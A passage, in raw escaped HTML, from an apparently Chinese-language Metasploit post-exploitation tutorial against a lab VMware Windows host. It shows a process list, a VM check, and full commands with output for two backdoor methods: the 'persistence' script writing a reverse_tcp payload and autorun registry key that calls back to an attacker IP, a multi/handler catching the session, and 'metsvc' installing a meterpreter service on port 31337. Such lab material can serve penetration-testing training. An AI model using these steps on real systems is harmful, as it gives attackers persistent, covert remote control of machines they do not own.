bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;-<\/p>\n\n\n\n<p>0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[System&nbsp;Process]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;4294967295&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;System&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>244&nbsp;&nbsp;&nbsp;4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;smss.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SystemRootSystem32smss.exe<\/p>\n\n\n\n<p>264&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYLOCAL&nbsp;SERVICE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>336&nbsp;&nbsp;&nbsp;328&nbsp;&nbsp;&nbsp;csrss.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\csrss.exe<\/p>\n\n\n\n<p>388&nbsp;&nbsp;&nbsp;380&nbsp;&nbsp;&nbsp;csrss.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\csrss.exe<\/p>\n\n\n\n<p>396&nbsp;&nbsp;&nbsp;328&nbsp;&nbsp;&nbsp;wininit.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\wininit.exe<\/p>\n\n\n\n<p>432&nbsp;&nbsp;&nbsp;380&nbsp;&nbsp;&nbsp;winlogon.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\winlogon.exe<\/p>\n\n\n\n<p>492&nbsp;&nbsp;&nbsp;396&nbsp;&nbsp;&nbsp;services.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\services.exe<\/p>\n\n\n\n<p>500&nbsp;&nbsp;&nbsp;396&nbsp;&nbsp;&nbsp;lsass.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\lsass.exe<\/p>\n\n\n\n<p>512&nbsp;&nbsp;&nbsp;396&nbsp;&nbsp;&nbsp;lsm.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\lsm.exe<\/p>\n\n\n\n<p>596&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>656&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYNETWORK&nbsp;SERVICE&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>748&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYLOCAL&nbsp;SERVICE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>796&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>840&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYLOCAL&nbsp;SERVICE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>856&nbsp;&nbsp;&nbsp;388&nbsp;&nbsp;&nbsp;conhost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:\\Windows\\system32\\conhost.exe<\/p>\n\n\n\n<p>860&nbsp;&nbsp;&nbsp;2044&nbsp;&nbsp;cmd.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:\\Windows\\system32\\cmd.exe<\/p>\n\n\n\n<p>884&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>924&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYNETWORK&nbsp;SERVICE&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>972&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;sppsvc.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYNETWORK&nbsp;SERVICE&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\sppsvc.exe<\/p>\n\n\n\n<p>976&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;spoolsv.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\spoolsv.exe<\/p>\n\n\n\n<p>1056&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYLOCAL&nbsp;SERVICE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>1092&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;vmtoolsd.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Program&nbsp;Files\\VMware\\VMware&nbsp;Toolsvmtoolsd.exe<\/p>\n\n\n\n<p>1332&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYNETWORK&nbsp;SERVICE&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>1492&nbsp;&nbsp;2044&nbsp;&nbsp;vmtoolsd.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:\\Program&nbsp;Files\\VMware\\VMware&nbsp;Toolsvmtoolsd.exe<\/p>\n\n\n\n<p>1560&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;dllhost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\dllhost.exe<\/p>\n\n\n\n<p>1640&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;msdtc.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYNETWORK&nbsp;SERVICE&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\msdtc.exe<\/p>\n\n\n\n<p>1968&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;taskhost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:\\Windows\\system32\\taskhost.exe<\/p>\n\n\n\n<p>2024&nbsp;&nbsp;884&nbsp;&nbsp;&nbsp;dwm.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:\\Windows\\system32\\Dwm.exe<\/p>\n\n\n\n<p>2044&nbsp;&nbsp;2016&nbsp;&nbsp;explorer.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:\\Windows\\Explorer.EXE<\/p>\n\n\n\n<p>2312&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>2428&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;mscorsvw.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\Microsoft.NETFramework64v2.0.50727\\mscorsvw.exe<\/p>\n\n\n\n<p>2588&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;mscorsvw.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\Microsoft.NETFrameworkv2.0.50727\\mscorsvw.exe<\/p>\n\n\n\n<p>2972&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n<p>\u5982\u4e0a\u6240\u793afile.exe\u8fdb\u7a0b\u5df2\u7ecf\u6ca1\u4e86\u3002\u9700\u8981\u6ce8\u610f\u7684\u662f\u5982\u679c\u5b58\u5728\u6740\u8f6f\u7684\u8bdd\u53ef\u80fd\u4f1a\u963b\u6b62\u8fdb\u7a0b\u6ce8\u5165<br>(3).\u6d4b\u8bd5\u662f\u4e0d\u662f\u865a\u62df\u673a<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;run&nbsp;post\/windows\/gather\/checkvm<\/p>\n\n\n\n<p>[*]&nbsp;Checking&nbsp;if&nbsp;WIN-K30V5SI0PCE&nbsp;is&nbsp;a&nbsp;Virtual&nbsp;Machine&nbsp;&#8230;..<\/p>\n\n\n\n<p>[*]&nbsp;This&nbsp;is&nbsp;a&nbsp;VMware&nbsp;Virtual&nbsp;Machine<\/p>\n\n\n\n<p>\u6211\u76842008\u662f\u88c5\u5728VMWare\u4e0a\u7684<br>(4).\u5b89\u88c5\u540e\u95e8<br>\u65b9\u6cd5\u4e00:persistence\u65b9\u6cd5<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;run&nbsp;&nbsp;persistence&nbsp;-h<\/p>\n\n\n\n<p>Meterpreter&nbsp;Script&nbsp;for&nbsp;creating&nbsp;a&nbsp;persistent&nbsp;backdoor&nbsp;on&nbsp;a&nbsp;target&nbsp;host.<\/p>\n\n\n\n<p>OPTIONS:<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-A&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Automatically&nbsp;start&nbsp;a&nbsp;matching&nbsp;multi\/handler&nbsp;to&nbsp;connect&nbsp;to&nbsp;the&nbsp;agent<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-L&nbsp;&lt;opt&gt;&nbsp;&nbsp;Location&nbsp;in&nbsp;target&nbsp;host&nbsp;where&nbsp;to&nbsp;write&nbsp;payload&nbsp;to,&nbsp;if&nbsp;none&nbsp;%TEMP%&nbsp;willbe&nbsp;used.<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-P&nbsp;&lt;opt&gt;&nbsp;&nbsp;Payload&nbsp;to&nbsp;use,&nbsp;default&nbsp;is&nbsp;windows\/meterpreter\/reverse_tcp.<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-S&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Automatically&nbsp;start&nbsp;the&nbsp;agent&nbsp;on&nbsp;boot&nbsp;as&nbsp;a&nbsp;service&nbsp;(with&nbsp;SYSTEM&nbsp;privileges)<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-T&nbsp;&lt;opt&gt;&nbsp;&nbsp;Alternate&nbsp;executable&nbsp;template&nbsp;to&nbsp;use<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-U&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Automatically&nbsp;start&nbsp;the&nbsp;agent&nbsp;when&nbsp;the&nbsp;User&nbsp;logs&nbsp;on<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-X&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Automatically&nbsp;start&nbsp;the&nbsp;agent&nbsp;when&nbsp;the&nbsp;system&nbsp;boots<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-h&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;This&nbsp;help&nbsp;menu<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-i&nbsp;&lt;opt&gt;&nbsp;&nbsp;The&nbsp;interval&nbsp;in&nbsp;seconds&nbsp;between&nbsp;each&nbsp;connection&nbsp;attempt<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;&lt;opt&gt;&nbsp;&nbsp;The&nbsp;port&nbsp;on&nbsp;the&nbsp;remote&nbsp;host&nbsp;where&nbsp;Metasploit&nbsp;is&nbsp;listening<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;-r&nbsp;&lt;opt&gt;&nbsp;&nbsp;The&nbsp;IP&nbsp;of&nbsp;the&nbsp;system&nbsp;running&nbsp;Metasploit&nbsp;listening&nbsp;for&nbsp;the&nbsp;connect&nbsp;back<\/p>\n\n\n\n<p>&nbsp;\u6267\u884c:<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;run&nbsp;persistence&nbsp;-X&nbsp;-i&nbsp;10&nbsp;-p&nbsp;2241&nbsp;-r&nbsp;192.168.111.129<\/p>\n\n\n\n<p>[*]&nbsp;Running&nbsp;Persistance&nbsp;Script<\/p>\n\n\n\n<p>[*]&nbsp;Resource&nbsp;file&nbsp;for&nbsp;cleanup&nbsp;created&nbsp;at&nbsp;\/root\/.msf4\/logs\/persistence\/WIN-K30V5SI0PCE_20140313.5419\/WIN-K30V5SI0PCE_20140313.5419.rc<\/p>\n\n\n\n<p>[*]&nbsp;Creating&nbsp;Payload=windows\/meterpreter\/reverse_tcp&nbsp;LHOST=192.168.111.129&nbsp;LPORT=2241<\/p>\n\n\n\n<p>[*]&nbsp;Persistent&nbsp;agent&nbsp;script&nbsp;is&nbsp;148439&nbsp;bytes&nbsp;long<\/p>\n\n\n\n<p>[+]&nbsp;Persistent&nbsp;Script&nbsp;written&nbsp;to&nbsp;C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs<\/p>\n\n\n\n<p>[*]&nbsp;Executing&nbsp;script&nbsp;C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs<\/p>\n\n\n\n<p>[+]&nbsp;Agent&nbsp;executed&nbsp;with&nbsp;PID&nbsp;2916<\/p>\n\n\n\n<p>[*]&nbsp;Installing&nbsp;into&nbsp;autorun&nbsp;as&nbsp;HKLM\\Software\\Microsoft\\Windows\\Current\\Version\\Run\\HstWtPyXHYnhQ<\/p>\n\n\n\n<p>[+]&nbsp;Installed&nbsp;into&nbsp;autorun&nbsp;as&nbsp;HKLM\\Software\\Microsoft\\Windows\\Current\\Version\\Run\\HstWtPyXHYnhQ<\/p>\n\n\n\n<p>\u73b0\u5728\u9000\u51fa\u670d\u52a1\u5668,\u91cd\u65b0\u914d\u7f6e\u76d1\u542c\u5668<\/p>\n\n\n\n<p>msf&nbsp;&gt;&nbsp;use&nbsp;multi\/handler<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;set&nbsp;PAYLOAD&nbsp;windows\/meterpreter\/reverse_tcp<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;set&nbsp;LHOST&nbsp;192.168.111.129<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;set&nbsp;LPORT&nbsp;2241<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;exploit<\/p>\n\n\n\n<p>[*]&nbsp;Started&nbsp;reverse&nbsp;handler&nbsp;on&nbsp;192.168.111.129:2241<\/p>\n\n\n\n<p>[*]&nbsp;Starting&nbsp;the&nbsp;payload&nbsp;handler&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;Sending&nbsp;stage&nbsp;(769024&nbsp;bytes)&nbsp;to&nbsp;192.168.111.133<\/p>\n\n\n\n<p>[*]&nbsp;Meterpreter&nbsp;session&nbsp;1&nbsp;opened&nbsp;(192.168.111.129:2241&nbsp;-&gt;&nbsp;192.168.111.133:49159)&nbsp;at2014-03-13&nbsp;23:01:55&nbsp;+0800<\/p>\n\n\n\n<p>\u5982\u56fe\uff0c\u53cd\u5f39\u6210\u529f\uff0c\u8fd9\u4e2a\u88ab\u52a8\u578b\u7684\u540e\u95e8\u5728\u67d0\u4e9b\u7279\u6b8a\u7684\u573a\u5408\u4f1a\u662f\u4e2a\u4e0d\u9519\u7684\u9009\u62e9<br>\u65b9\u6cd5\u4e8c:metsvc<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;run&nbsp;metsvc<\/p>\n\n\n\n<p>[*]&nbsp;Creating&nbsp;a&nbsp;meterpreter&nbsp;service&nbsp;on&nbsp;port&nbsp;31337<\/p>\n\n\n\n<p>[*]&nbsp;Creating&nbsp;a&nbsp;temporary&nbsp;installation&nbsp;directory&nbsp;C:\\Users\\ADMINI~1\\AppData\\LocalTemp\\HzWbqqRpuBlxn&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&gt;&gt;&nbsp;Uploading&nbsp;metsrv.x86.dll&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&gt;&gt;&nbsp;Uploading&nbsp;metsvc-server.exe&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&gt;&gt;&nbsp;Uploading&nbsp;metsvc.exe&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;Starting&nbsp;the&nbsp;service&#8230;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*&nbsp;Installing&nbsp;service&nbsp;metsvc<\/p>\n\n\n\n<p>*&nbsp;Starting&nbsp;service<\/p>\n\n\n\n<p>Service&nbsp;metsvc&nbsp;successfully&nbsp;installed.<\/p>\n\n\n\n<p>metsvc\u540e\u95e8\u5b89\u88c5\u6210\u529f\uff0c\u63a5\u4e0b\u6765\u662f\u8f